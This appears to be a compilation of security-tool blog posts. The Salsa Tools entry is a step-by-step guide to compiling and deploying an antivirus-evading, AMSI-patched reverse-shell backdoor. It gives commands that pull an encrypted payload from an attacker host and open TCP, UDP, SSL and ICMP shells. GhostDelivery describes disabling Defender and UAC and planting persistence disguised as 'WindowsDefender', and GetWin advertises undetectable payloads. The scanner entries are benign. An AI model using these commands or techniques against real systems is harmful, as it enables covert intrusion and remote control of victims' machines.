Getwin – FUD Win32 Payload Generator And Listener

FUD Win32 payload generator and listenerLegal disclaimer:Usage of GetWin for attacking targets without prior mutual consent is illegal. It’s the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this programFeaturesFUD : Fully UndetectableNo Need configure port forwarding, or install others programs, using only ssh and serveo.net.Usage:git clone https://github.com/thelinuxchoice/getwincd getwinbash getwin.shInstall requirements (mingw-w64):sudo apt-get install mingw-w64Download Getwin

Link: http://feedproxy.google.com/~r/PentestTools/~3/nJnC39lKrHQ/getwin-fud-win32-payload-generator-and.html

Rustbuster – DirBuster For Rust

DirBuster for Rust.UsageThere are three modules currently implemented: Dirbuster (default) rustbuster -m dir -u http://localhost:3000/ -w examples/wordlist -e php Dnsbuster rustbuster -m dns -u google.com -w examples/wordlist Vhostbuster rustbuster -m vhost -u http://localhost:3000/ -w examples/wordlist -d test.local -x “Hello" _ _ _ _ _ _ _ _ _ _ /\ \ /\_\ / /\ /\ \ / /\ /\_\ / /\ /\ \ /\ \ /\ \ / \ \/ / / _ / / \ \_\ \ / / \ / / / _ / / \ \_\ \ / \ \ / \ \ / /\ \ \ \ \__ /\_\/ / /\ \__ /\__ \ / / /\ \ \ \ \__ /\_\/ / /\ \__ /\__ \ / /\ \ \ / /\ \ \ / / /\ \_\ \___\ / / / / /\ \___\/ /_ \ \ / / /\ \ \ \ \___\ / / / / /\ \___\/ /_ \ \ / / /\ \_\ / / /\ \_\ / / /_/ / /\__ / / / /\ \ \ \/___/ / /\ \ \/ / /\ \_\ \ \__ / / / /\ \ \ \/___/ / /\ \ \/ /_/_ \/_/ / / /_/ / / / / /__\/ / / / / / / / \ \ \ / / / \/_/ / /\ \ \___\ / / / / / / \ \ \ / / / \/_/ /____/\ / / /__\/ / / / /_____/ / / / / / _ \ \ \ / / / / / / \ \ \__// / / / / _ \ \ \ / / / / /\____\/ / / /_____/ / / /\ \ \ / / /___/ / /_/\__/ / / / / / / / /____\_\ \ / / /___/ / /_/\__/ / / / / / / / /______ / / /\ \ \ / / / \ \ \/ / /____\/ /\ \/___/ / /_/ / / / /__________/ / /____\/ /\ \/___/ / /_/ / / / /_______/ / / \ \ \ \/_/ \_\/\/_________/ \_____\/ \_\/ \/_____________\/_________/ \_____\/ \_\/ \/__________\/_/ \_\/ ~ rustbuster v. 1.2.0 ~ by phra & ps1dr3x ~USAGE: rustbuster [FLAGS] [OPTIONS] –url –wordlist <wordlist>FLAGS: -f, –append-slash Tries to also append / to the base request -K, –exit-on-error Exits on connection errors -h, –help Prints help information -k, –ignore-certificate Disables TLS certificate validation –no-banner Skips initial banner –no-progress-bar Disables the progress bar -V, –version Prints version information -v, –verbose Sets the level of verbosityOPTIONS: -d, –domain <domain> Uses the specified domain -e, –extensions <extensions> Sets the extensions [default: ] -b, –http-body <http-body> Uses the specified HTTP method [default: ] -H, –http-header <http-header>… Appends the specified HTTP header -X, –http-method <http-method> Uses the specified HTTP method [default: GET] -S, –ignore-status-codes <ignore-status-codes> Sets the list of status codes to ignore [default: 404] -x, –ignore-string <ignore-string>… Ignores results with specified string in vhost mode -s, –include-status-cod es <include-status-codes> Sets the list of status codes to include [default: ] -m, –mode <mode> Sets the mode of operation (dir, dns, fuzz) [default: dir] -o, –output <output> Saves the results in the specified file [default: ] -t, –threads <threads> Sets the amount of concurrent requests [default: 10] -u, –url <url> Sets the target URL -a, –user-agent <user-agent> Uses the specified User-Agent [default: rustbuster] -w, –wordlist <wordlist> Sets the wordlistDownload Rustbuster

Link: http://feedproxy.google.com/~r/PentestTools/~3/HFSIPHDgci8/rustbuster-dirbuster-for-rust.html

Salsa Tools – ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP and AV bypass, AMSI patched

Salsa Tools is a collection of three different tools that combined, allows you to get a reverse shell on steroids in any Windows environment without even needing PowerShell for it’s execution. In order to avoid the latest detection techniques (AMSI), most of the components were initially written on C#. Salsa Tools was publicly released by Luis Vacas during his Talk “Inmersión en la explotación tiene rima” which took place during h-c0n in 9th February 2019.Features* TCP/UDP/ICMP/DNS/BIND/SSL * AV Safe (17th February)* AMSI patchers* PowerShell execution * …OverviewSalsa-Tools is made from three different ingredients: – EvilSalsa – EncrypterAssembly – SalseoLoader And his behavior is as it follows:SetupRequirementsVisual Studio 2017 (or similar)Python 2.7Running la SalsaCooking EvilSalsa ___ __ __ ____ _ / _] | || || | / [_| | | | | | | | _] | | | | | |___ | [_| : | | | | | | |\ / | | | | |_____| \_/ |____||_____| _____ ____ _ _____ ____ / ___/ / || | / ___/ / |( \_ | o || | ( \_ | o | \__ || || |___\__ || | / \ || _ || / \ || _ | \ || | || \ || | | \___||__|__||_____|\___||__|__| [+] That is our Payload EvilSalsa is the key ingredient of this recipe. It contains the payload, which is executed on the system as it follows: as soon as the payloads starts, it runs System.Management.Automation.dll which creates a runspace . Within that runspace we have four types of shells (TCP / UDP / ICMP / DNS / BINDTCP). Once EvilSalsa is loaded, first thing first, the existence of c:\windows\system32\amsi.dll is checked. If it exists, it is patched using a home-cooked variant of CyberArk and Rastamouse bypasses.Mixing EncrypterAssembly and Evilsalsa ______ _ | ____| | | | |__ _ __ ___ _ __ _ _ _ __ | |_ ___ _ __ | __| | ‘_ \ / __| ‘__| | | | ‘_ \| __/ _ \ ‘__| | |____| | | | (__| | | |_| | |_) | || __/ | |______|_| |_|\___|_| \__, | .__/ \__\___|_| /\ __/ | || | | | / \ ___ ___ ___ _|___/|_|| |__ | |_ _ / /\ \ / __/ __|/ _ \ ‘_ ` _ \| ‘_ \| | | | | / ____ \\__ \__ \ __/ | | | | | |_) | | |_| | /_/ \_\___/___/\___|_| |_| |_|_.__/|_|\__, | __/ | |___/ [+] Software that encrypts the payload using RC4 [+] We have the version in python and the version in .exeEncrypterAssembly can be used as a Python script or as a Exe binary. It encrypts the previously generated EvilSalsa.Python usage:python encrypterassembly.py <PASSWORD> <OUTPUT>Executable usage:Encrypterassembly.exe <FILE> <PASSWORD> <OUTPUT>Bringing the Encrypted EvilSalsa to the table with SalseoLoaderSalseoLoader is in charge of loading the encrypted payload. Can be both compiled as a library or as an executable. If it is run as an executable, the chosen arguments must be provided when the executable is run. If it is compiled as a library, the descriptor “main" must be exported. Arguments are added using environmental variables. _____ ____ _ _____ ___ ___ / ___/ / || | / ___/ / _] / \( \_ | o || | ( \_ / [_ | | \__ || || |___\__ || _]| O | / \ || _ || / \ || [_ | | \ || | || \ || || | \___||__|__||_____|\___||_____| \___/ _ ___ ____ ___ ___ ____| | / \ / || \ / _]| \| | | || o || \ / [_ | D )| |___ | O || || D || _]| /| || || _ || || [_ | \| || || | || || || . \|_____| \___/ |__|__||_____||_____||__|\_| By: CyberVaca@HackPlayers[+] Usage: [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT [-] SalseoLoader.exe password \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt R everseICMP LHOST [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS [-] SalseoLoader.exe password http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT [-] SalseoLoader.exe password c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT [-] SalseoLoader.exe password http://webserver.com/shellcode.txt shellcode[+] Shells availables: [-] ReverseTCP [-] ReverseDNS [-] ReverseSSL [-] Shellcode [-] ReverseUDP [-] ReverseICMP [-] BindTCPTutorialCompiling the binariesDownload the source code from the github and compile EvilSalsa and SalseoLoader. You will need Visual Studio installed to compile the code.Compile those projects for the architecture of the windows box where your are going to use them(If the Windows supports x64 compile them for that architectures).You can select the architecture inside Visual Studio in the left "Build" Tab in "Platform Target".(If you can’t find this options press in "Project Tab" and then in " Properties")Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):Prepare the BackdoorFirst of all, you will need to encode the EvilSalsa.dll. To do so, you can use the python script encrypterassembly.py or you can compile the project EncrypterAssemblyPythonpython EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll password evilsalsa.dll.txtWindowsEncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>EncrypterAssembly.exe EvilSalsa.dll password evilsalsa.dll.txtOk, now you have everything you need to execute all the Salseo thing: the encoded EvilDalsa.dll and the binary of SalseoLoader. Upload the SalseoLoader.exe binary to the machine. It shouldn’t be detected by any AV…Execute the backdoorGetting a TCP reverse shell (downloading encoded dll through HTTP)Remember to start a nc as the reverse shell listener, and a HTTP server to serve the encoded evilsalsa.SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>Getting a UDP reverse shell (downloading encoded dll through SMB)Remember to start a nc as the reverse shell listener, and a SMB server to serve the encoded evilsalsa (impacket-smbserver).SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>Getting a TCP reverse shell SSL (using local file)Set the listener inside the attacker machine:openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodesopenssl s_server -key key.pem -cert cert.pem -port <port> -tls1Execute the backdoor:SalseoLoader.exe password C:/path/to/evilsalsa.dll.txt ReverseSSL <Attacker-IP> <Port>Getting a ICMP reverse shell (encoded dll already inside the victim)This time you need a special tool in the client to receive the reverse shell. Download: [https://github.com/inquisb/icmpsh]Disable ICMP Replies: #You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0 Execute the client:python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"Inside the victim, lets execute the salseo thing:SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>Compiling SalseoLoader as DLL exporting main functionOpen the SalseoLoader project using Visual Studio.Add before the main function: [DllExport]Before the main function add this line: [DllExport]Install DllExport for this projectTools –> NuGet Package Manager –> Manage NuGet Packages for Solution…Search for DllExport package (using Browse tab), and press Install (and accept the popup)In your project folder have appeared the files: DllExport.bat and DllExport_Configure.batUninstall DllExportPress Uninstall (yeah, its weird but trust me, it is necessary)Exit Visual Studio and execute DllExport_configureJust exit Visual StudioThen, go to your SalseoLoader folder and execute DllExport_Configure.bat Select x64 (if you are going to use it inside a x64 box, that was my case), select System.Runtime.InteropServices (inside Namespace for DllExport) and press ApplyOpen the project again with visual Studio[DllExport] should not be longer marked as errorBuild the solutionSelect Output Type = Class Library (Project –> SalseoLoader Properties –> Application –> Output type = Class Library)Select x64 platform (Project –> SalseoLoader Properties –> Build –> Platform target = x64)To build the solution: Build –> Build Solution (Inside the Output console the path of the new DLL will appear)Test the generated DllCopy and paste the Dll where you want to test it.Execute:rundll32.exe SalseoLoader.dll,mainIf not error appears, probably you have a functional dll!!Get a shell using the DllDon’t forget to use a HTTP server and set a nc listenerPowershell#You finish, you can enable it again running:sysctl -w net.ipv4.icmp_echo_ignore_all=0CMD$env:pass="password"$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"$env:lhost="10.2.0.5"$env:lport="1337"$env:shell="reversetcp"rundll32.exe SalseoLoader.dll,mainDocumented by https://github.com/carlospolop-forks/Download Salsa-tools

Link: http://feedproxy.google.com/~r/PentestTools/~3/Xgz-WkNK1wE/salsa-tools-shellreverse.html

Intensio-Obfuscator – Obfuscate A Python Code 2.X And 3.X

Takes a python source code and transform it into an obfuscated python code, replace name of variables – classes – functions to random chars and defined length, removes comments, line breaks and add to each line a random script with an always differents values.RequirementPython >= 3.5Files supportedFiles written in python 2.x and 3.xInstallationgit clone https://github.com/Hnfull/Intensio-Obfuscator.gitcd Intensio-Obfuscator/intensio/Features Feature Description Replace Replace all names of variables – classes – functions defined and remove all line breaks Padding Add random scripts after each line and remove all line breaks Remove Remove all commentaries and all line breaks Secret Only for the curious 🙂 Mixer lower Generate words with 32 chars that replace variables – classes – functions defined in source code and in random scripts if ‘replace’ or ‘padding’ features are specified Mixer medium Generate words with 64 chars that replace variables – classes – functions defined in source code and in random scripts if ‘replace’ or ‘padding’ features are specified Mixer high Generate words with 128 chars that replace variables – classes – functions defined in source code and in random scripts if ‘replace’ or ‘padding’ features are specified Usages-h, –help -> show this help message and exit.-f, –onefile -> if only one file.-d, –multiplefiles -> if multiple files (project).-i, –input -> source file or directory – if multiple files indicate a directory that contain all your files.-c, –code -> language used in input file or directory. value: [python]-o, –output -> output file or directory that will be obfuscated – if multiple file indicate a empty directory that will contain all your files.-m, –mixer -> length level of variables mix output. values: [lower,medium,high]-r, –replace -> activate the ‘replace’ obfuscation feature.-p, –padding -> activate the ‘padding’ obfuscation feature.-rm, –remove -> activate the ‘remove’ obfuscation f eature.-s, –secret -> activate the ‘secret’ bullshit feature.If you want exclude python variables – classes – functions which will be taken by the ‘replace’ feature, edit intensio/exclude_python_words.txtIf you want to include python variables – classes – functions that are not included when launching the ‘replace’ feature, edit intensio/include_python_words.txtDo not define identically your names of local variables – classes – functions to python keywords or names of functions – classes of imported python libraries !!ExamplesPython target file(s): Multiple files basic: python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/basic/input/basicRAT -c python -o test/python/multiplefiles/basic/output/basicRAT -m lower -r -rm Source directory of projectOutput directory of project Multiple files advanced: python3.x intensio_obfuscator.py -d -i test/python/multiplefiles/advanced/input/basicRAT -c python -o test/python/multiplefiles/advanced/output/basicRAT -m high -r -p -rm Source directory of projectOutput directory of project If it’s one file only, the command is same that for multiple file, just do not pointed a directory but a python file directly for -i and -o parameters, then change -d parameter into -f parameter Possible malfunctionsIf a variable – class – function has an identical name with a word between ‘ ‘ or ” " in print() function, your text will have the same value that the mixer variables – class – function.If a variable – class – function has an identical name with a word in after # (commentary) your text will have the same value that the mixer variables – class – function, but if between """ or ”’ without a variables before, no replacing is performed.If you named your variables – classes – functions in the same way as python keywords or names of functions/class of imported python libraries, an error may appear. Edit intensio/excluded_python_words.txt to add the variables not to obfuscate or change your names of local variables – classes – fuctions, if your variables – classes – functions have the same name as a keyword it, he will be obfuscated and errors will appear.Todo Version 1.0.1-x: Code optimizationFix bugs and problemsImproved features already present Version 1.1.0: Support files written in C Version 1.2.0: Support files written in C++DisclamerIntensio-Obfuscator is for education/research purposes only. The author takes NO responsibility ay for how you choose to use any of the tools providedDownload Intensio-Obfuscator

Link: http://feedproxy.google.com/~r/PentestTools/~3/0dAHTVR5GAU/intensio-obfuscator-obfuscate-python.html

Yaazhini – Free Android APK & API Vulnerability Scanner

Yaazhini is a free vulnerability scanner for android APK and API. It is a user-friendly tool that you can easily scan any APK and API of android application and find the vulnerabilities. Yaazhini includes vulnerability scan of API, the vulnerability of APK and reporting section to generate a report.System RequirementsOperating Systems Mac OSX(64bit), Windows(64bit & 32bit)RAM Minimum Usage 4GB of available memory. 16GB required for larger Android AppsStorage 10GB of available disk spaceDependancy Software Java 1.8+Advantages of Yaazhini    Scan Android APK by just one click    Scan Android Application REST API (emulator, device)    Generate report    Free to use    Easy to useHow to use Yaazhini Android Application APK Scanner    Start the Yaazhini Application.    Provide the project name    Upload the APK file    Click on Upload & Scanbutton    After the scan gets completed we can see all detail of vulnerability and generate the reportYaazhini – Android Application Rest API ScannerYaazhini – Android Application Rest API Scanner can help you to find the following attacks    SQL Injection    Command Injection    Header Injection    Cross-site Scripting ( possibilities )    Missing Security Headers    Sensitive Information Disclosure in Response Headers    Sensitive Information Disclosure in Error messages    Missing Server Side Input Validation    Unwanted Use of HTTP Methods    Improper HTTP Response and moreHow to use Yaazhini Android Application Rest ScannerStart Application.Tests MobileSecurity TestingTesting ToolCommand LineTesting SuiteDevice Or EmulatorCreate a New Project.Add the New Request in the Created Project.Provide Proper Headers, URL, and Data.Save and Run the Scan From the Menu Bar.After Scan Gets Completed Click on Generate Report From the Menu Bar.Sample Reports for YaazhiniYaazhini-Android APK Scanner Sample report starts with a quick summary of the findings and risk ratings. Each finding has a detailed explanation in terms of risk and recommendations about the vulnerability. The vulnerabilities are ordered by the risk level.Get Here: Yaazhini-Android APK Scanner Sample Report.Yaazhini -Mobile Application Scanner Sample report Sample report starts with a quick summary of the findings and risk ratings. Each finding has a detailed explanation in terms of risk and recommendations about the vulnerability. The vulnerabilities are ordered by the risk level.Get Here: Yaazhini- Mobile Application Scanner Sample report.Download Yaazhini

Link: http://feedproxy.google.com/~r/PentestTools/~3/6kC6ytwB1jU/yaazhini-free-android-apk-api.html

Faraday v3.8 – Collaborative Penetration Test and Vulnerability Management Platform

Here are the main new features and improvements in Faraday v3.8:Set up Faraday with a double click!We are committed to facilitate your work processes. With that in mind, we enhanced our installation phases, so now it’s easier to have Faraday on your devices: You can download our platform with just two clicks.This is the first step on the hard work we’re doing to migrate our platform to Python 3  (In progress!).Sailing downwind with Faraday on Docker!Explore Faraday’s whole potential by testing it first with our new Docker images. When you are ready, you can download the whole thing to set it up and upgrade your Risk Management Ecosystem :)More powerful than a sticky note!To provide value, information must be complete, updated and well focused. Now, you can enrich Vuln data by leaving Comments and Notes, while mentioning other users to notify them about important events in real time. Also, you are now able to configure alerts to follow up on each project, having a more efficient view of their status and updates.The idea behind this is promoting better ways to get involved with your co-workers by improving communication and daily results.New setting options on Web UI! Forget about logging in each time you want to send a Vuln to Jira or ServiceNOW.  Just configure the ticketing tool you’ll be using from the Settings menu and enjoy working seamlessly. Download Faraday v3.8

Link: http://www.kitploit.com/2019/06/faraday-v38-collaborative-penetration.html

Recsech – Tool For Doing Footprinting And Reconnaissance On The Target Web

Recsech is a tool for doing Footprinting and Reconnaissance on the target web. Recsech collects information such as DNS Information, Sub Domains, HoneySpot Detected, Subdomain takeovers, Reconnaissance On Github and much more you can see in Features in tools .Features in tools Name Release Release Date Auto request with Proxy yes 01/05/19 Find Email yes 01/05/19 HoneySpot Detected yes 01/05/19 Subdomain takeover yes 01/05/19 Check Technologies yes 01/05/19 Whois no N/A Crlf injection no N/A Header Security yes 01/05/19 Update Check yes 01/05/19 Port Scanner yes 02/05/19 Sort Domain By IP yes 02/05/19 WordPress audit no N/A Reconnaissance On Github yes 02/05/19 Language Selection yes 02/05/19 WAF yes 03/05/19 Requirements for using this toolWe need several requirements to use this tool to run smoothly.LinuxPHP 7.xPHP curlWindowsXAMP >= 7.3.5InstallationYou can download the latest tarball by clicking here or latest zipball by clicking here.Preferably, you can download sqlmap by cloning the Git repository:git clone –depth 1 https://github.com/radenvodka/Recsech.git RecsechRecsech Environment Windows (Command Prompt Windows)Download RecsechHow to install to Windows CLI :Extract all files in C: \WindowsEdit Files Recsech.bat , then set your PHP patch (if you have installed xampp on your C drive you don’t need to do this step)@echo offset PATH=%PATH%;C:\xampp\phptitle Recsech – Recon and Researchphp “C:\Windows\Recsech.php" %1Open cmd and do the Recsech command.UsageEnough to execute the command :php Recsech.php example.comor if it doesn’t work, use the command :php Recsech.php debugand don’t forget to ask at issue pageDownload Recsech

Link: http://feedproxy.google.com/~r/PentestTools/~3/fA2yZMgyywc/recsech-tool-for-doing-footprinting-and.html

GhostDelivery – This Tool Creates A Obfuscated .vbs Script To Download A Payload Hosted On A Server To %TEMP% Directory, Execute Payload And Gain Persistence

Python script to generate obfuscated .vbs script that delivers payload with persistence and windows antivirus disabling functions.Features:Downloads payload to TEMP directory and executes payload to bypass windows smart screen. Disables Defender, UAC/user account control, Defender Notifications, injects/creates Command Prompt and Microsoft Edge shortcuts with payload path (%TEMP%/payload.exe), adds a scheduled task called “WindowsDefender" for payload to be run at login and obfuscates the vbs delivery script. This tool also has a serveo function to deliver obfuscated vbs script.Light version:The light version is less noisy and only delivers/executes payload, creates a scheduled task named "WindowsDefender" to run payload at login for persistence and injects/creates Command Prompt and Microsoft Edge shortcuts with payload path.Prerequisites/requirements:*Python 2.7, Modules imported in script. (random, sys, string, os, time, base64)Download GhostDelivery

Link: http://feedproxy.google.com/~r/PentestTools/~3/oWV8asKvS20/ghostdelivery-this-tool-creates.html